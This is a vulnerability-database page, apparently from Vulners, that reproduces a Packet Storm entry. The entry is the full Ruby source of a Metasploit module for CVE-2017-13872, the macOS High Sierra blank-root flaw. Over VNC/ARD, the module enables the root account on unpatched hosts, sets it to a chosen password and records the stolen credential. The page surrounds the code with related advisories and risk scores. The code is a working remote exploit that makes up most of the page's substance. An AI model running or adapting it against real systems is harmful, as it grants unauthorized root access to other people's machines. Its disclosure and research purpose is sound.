Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apple Remote Desktop Root

🗓️ 01 Sep 2024 00:00:00Reported by jgor, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 166 Views

Apple Remote Desktop Root Vulnerability, Set root account to chosen password on unpatched macOS with Screen Sharing or Remote Management enabled

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Apple macOS 10.13.1 High Sierra - Blank Root Local Privilege Escalation Vulnerability
9 Dec 201700:00
zdt
Tenable Nessus		macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)
10 Apr 201900:00
nessus
Tenable Nessus		MacOS 10.13 root Authentication Bypass (Security Update 2017-001)
28 Nov 201700:00
nessus
Tenable Nessus		macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)
7 Dec 201700:00
nessus
Tenable Nessus		macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)
7 Dec 201700:00
nessus
Tenable Nessus		macOS 10.13 Authentication Bypass Remote Check (CVE-2017-13872)
4 Dec 201700:00
nessus
Tenable Nessus		macOS 10.13 root Authentication Bypass Direct Check
29 Nov 201700:00
nessus
Apple		About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan
6 Dec 201700:00
apple
Apple		About the security content of Security Update 2017-001
29 Nov 201700:00
apple
Apple		About the security content of Security Update 2017-001 - Apple Support
2 Dec 201704:57
apple
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Apple Remote Desktop Root Vulnerability',  
'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.',  
'References' =>  
[  
['CVE', '2017-13872'],  
['URL', 'https://support.apple.com/en-us/HT208315']  
],  
'Author' => 'jgor',  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
Opt::RPORT(5900),  
OptString.new('PASSWORD', [false, 'Set root account to this password', ''])  
])  
end  
  
def log_credential(password)  
print_good("Login succeeded - root:#{password}")  
  
service_data = {  
address: target_host,  
port: rport,  
service_name: 'vnc',  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
module_fullname: self.fullname,  
origin_type: :service,  
username: 'root',  
private_data: password,  
private_type: :password  
}.merge(service_data)  
  
credential_core = create_credential(credential_data)  
  
login_data = {  
core: credential_core,  
last_attempted_at: DateTime.now,  
status: Metasploit::Model::Login::Status::SUCCESSFUL  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def run_host(target_host)  
begin  
if datastore['PASSWORD'].empty?  
password = Rex::Text::rand_text_alphanumeric(16)  
else  
password = datastore['PASSWORD']  
end  
  
connect  
vnc = Rex::Proto::RFB::Client.new(sock)  
if vnc.handshake  
type = vnc.negotiate_authentication  
unless type = Rex::Proto::RFB::AuthType::ARD  
print_error("VNC server does not advertise security type ARD.")  
return  
end  
print_status("Attempting authentication as root.")  
if vnc.authenticate_with_type(type, 'root', password)  
log_credential(password)  
return  
end  
else  
print_error("VNC handshake failed.")  
return  
end  
disconnect  
  
connect  
vnc = Rex::Proto::RFB::Client.new(sock)  
print_status("Testing login as root with chosen password.")  
if vnc.handshake  
if vnc.authenticate_with_user('root', password)  
log_credential(password)  
return  
end  
else  
print_error("VNC handshake failed.")  
return  
end  
disconnect  
  
connect  
vnc = Rex::Proto::RFB::Client.new(sock)  
print_status("Testing login as root with empty password.")  
if vnc.handshake  
if vnc.authenticate_with_user('root', '')  
log_credential('')  
return  
end  
else  
print_error("VNC handshake failed.")  
return  
end  
  
ensure  
disconnect  
end  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 38.1
CVSS 29.3
EPSS0.76664
appleremote desktopvulnerabilitymacos high sierrascreen sharingremote managementcve-2017-13872metasploitroot accountpasswordsecurity issuevnc
166